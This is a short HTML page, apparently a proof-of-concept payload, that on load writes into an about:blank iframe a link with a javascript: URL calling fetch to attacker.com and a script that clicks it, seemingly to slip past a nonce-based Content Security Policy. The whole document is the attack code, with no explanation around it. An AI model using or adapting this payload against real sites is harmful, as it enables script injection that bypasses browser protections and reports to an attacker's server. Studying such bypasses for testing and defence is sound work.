<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGNQLfUGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGNQLfUGGGGG.onload=_=>GGGGGNQLfUGGGGG.contentDocument.body.innerHTML+="<a id=a1 href='javascript:fetch(`https://attacker.com/report/report`)'>click<\/a><script>GGGGNQLfUGGGG.click();<\/script>";GGGGGNQLfUGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>